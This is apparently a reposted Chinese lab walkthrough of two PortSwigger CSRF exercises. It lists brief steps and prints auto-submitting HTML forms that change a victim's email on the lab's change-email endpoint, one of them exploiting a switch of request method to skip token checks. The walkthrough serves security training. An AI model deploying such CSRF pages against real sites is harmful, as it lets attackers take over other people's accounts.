实验1:CSRF vulnerability with no defenses
1.登录后修改邮箱抓包,生成csrf
2.使用burpsuite生成的html包进行存储和向受害者发送(每次发送需要变更邮箱)
3.再使用靶场提供的包进行存储和向受害者发送,通过此关
<form method="POST" action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email"> <input type="hidden" name="email" value="anything%40web-security-academy.net"> </form> <script> document.forms[0].submit(); </script>
实验2:CSRF where token validation depends on request method
1.登录后修改邮箱抓包,变更请求方法并生成csrf包
2.使用burpsuite生成的html包进行存储和向受害者发送
3.再使用靶场提供的包进行存储和向受害者发送,通过此关(每次发送需要变更邮箱)
<form action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email"> <input type="hidden" name="email" value="anything%40web-security-academy.net"> </form> <script> document.forms[0].submit(); </script>
原文始发于微信公众号(鲲哥的Bypass之旅):portswigger CSRF靶场-Lab1,2
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论